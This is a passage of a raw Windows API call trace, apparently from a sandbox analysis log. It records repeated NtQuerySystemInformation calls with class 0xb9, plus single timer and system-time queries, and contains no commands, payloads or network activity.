[0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x28, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc940, Length=0x28, ResultLength=0x0) [0272.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x38, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb50 | out: lpSystemTimeAsFileTime=0xc751dfcb50*(dwLowDateTime=0x3feafa4, dwHighDateTime=0x1d5fb6f)) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc08, Length=0x50, ResultLength=0x0) [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0272.994] GetTickCount () returned 0x11848ce [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6b0, Length=0x28, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x38, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0273.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc928, Length=0x58, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0273.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, 